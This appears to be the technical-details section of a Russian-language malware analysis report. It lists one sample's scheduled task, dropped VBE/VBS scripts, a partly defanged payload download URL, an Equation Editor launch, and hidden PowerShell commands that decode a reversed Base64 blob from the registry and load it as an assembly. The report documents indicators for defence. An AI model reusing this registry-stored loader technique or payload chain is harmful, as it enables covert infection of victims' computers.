Техническая информация
- <SYSTEM32>\tasks\bmprobekquttaxf
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\wegivenbestthingswithbetterperofmrnacethingsonlin.vbe"
- %APPDATA%\wegivenbestthingswithbetterperofmrnacethingsonlin.vbe
- %APPDATA%\bmprobekquttaxf.vbs
- '10#.#68.5.62':80
- http://10#.#68.5.62/56/wegivenbestthingswithbetterperofmrnacethingsonline.vbe
- '<SYSTEM32>\wscript.exe' "%APPDATA%\bmpRoBeKqUTtaXF.VBS"
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command $ll='HKCU:\Software\bmpRoBeKqUTtaXF';$v='test';$ee=gp $ll;$uu=[Convert]::FromBase64String(($ee.$v|%{$_[-1..-($_.Length)]}) -join '');[System.Reflection.Assembly]::L... (со скрытым окном)
- '<SYSTEM32>\taskeng.exe' {FD32B32D-CBE6-4337-A5AE-07E5E8EFE725} S-1-5-21-3691498038-2086406363-2140527554-1000:cfhlgiougf\user:Interactive:[1]
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command $ll='HKCU:\Software\bmpRoBeKqUTtaXF';$v='test';$ee=gp $ll;$uu=[Convert]::FromBase64String(($ee.$v|%{$_[-1..-($_.Length)]}) -join '');[System.Reflection.Assembly]::L... (со скрытым окном)
- '<SYSTEM32>\wscript.exe' "%APPDATA%\bmpRoBeKqUTtaXF.VBS" (со скрытым окном)